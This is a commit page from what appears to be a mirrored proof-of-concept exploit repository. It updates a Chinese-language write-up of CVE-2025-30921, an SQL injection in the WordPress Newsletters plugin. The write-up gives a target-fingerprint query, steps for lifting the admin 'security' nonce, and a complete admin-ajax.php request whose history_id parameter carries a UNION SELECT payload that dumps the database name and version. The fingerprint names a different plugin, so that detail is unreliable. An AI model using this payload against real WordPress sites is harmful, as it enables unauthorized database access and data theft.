admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 09:51:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md

Browse Source
This commit is contained in:
Rainyseason 2025-04-07 11:32:41 +08:00 committed by GitHub
parent 30cd11c2e4
commit ab967c7b6b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
wpoc/WordPress/WordPress Newsletters Plugin存在SQL漏洞(CVE-2025-30921).md
View File

@ -8,13 +8,14 @@ WordPress在Newsletters插件版本4.9.9.7或更低版本的插件仪表板中
body="/wp-content/plugins/web-directory-free" body="/wp-content/plugins/web-directory-free"
``` ```
## poc-(需要Administrator权限) ## 前提条件和Administrator权限
使用浏览器开发者工具action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如如果搜索结果如下所示请记下22b1ac0de6 使用浏览器开发者工具action=wpmlwelcomestats&security=在“元素”选项卡中搜索 并检查 的值security。例如如果搜索结果如下所示请记下22b1ac0de6
``` ```
jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) { jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
``` ```
![image](https://github.com/user-attachments/assets/c82f3e9a-fd70-405f-b6d0-d9bd77622f76) ![image](https://github.com/user-attachments/assets/c82f3e9a-fd70-405f-b6d0-d9bd77622f76)
## poc
```javascript ```javascript
http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23 http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
``` ```